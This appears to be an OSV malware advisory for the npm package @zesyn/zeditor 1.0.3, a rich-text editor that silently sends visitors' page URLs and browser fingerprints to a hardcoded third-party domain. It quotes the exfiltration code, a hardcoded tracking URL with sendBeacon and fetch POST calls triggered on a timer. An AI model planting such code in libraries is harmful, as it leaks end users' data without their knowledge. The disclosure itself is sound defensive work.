npm

@zesyn/zeditor @1.0.3

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-4471

Ecosystem

npm

Summary

The package advertises itself as a browser rich-text editor, but on every new Zeditor(...) instantiation it waits 2 seconds and then POSTs end-user telemetry to the hardcoded URL https://yourdomain.com/zeditor-api/track.php, via navigator.sendBeacon with a fetch POST fallback. The exfiltrated payload includes the page URL (up to 500 chars), referrer, hostname, browser language, screen size, timezone, full user-agent string, and install method.

The destination is the unconfigured placeholder yourdomain.com, a real third-party domain that is not owned by the package's publisher (zesyn.com). Any application that embeds this editor in production silently ships every visitor's browsing context and fingerprint to whoever currently controls yourdomain.com.

Code locations: dist/zeditor.es.js defines const T = "https://yourdomain.com/zeditor-api/track.php" and calls navigator.sendBeacon(T, l) / fetch(T, { method: "POST", body: JSON.stringify(a) }) from init() via setTimeout(() => Y(), 2e3); equivalent code is present in the IIFE and UMD bundles.

Source: amazon-inspector (7c8e293ad2413e2e04b9ce3411d1650381143b104c40bbcb4a17c1140c9ef912)
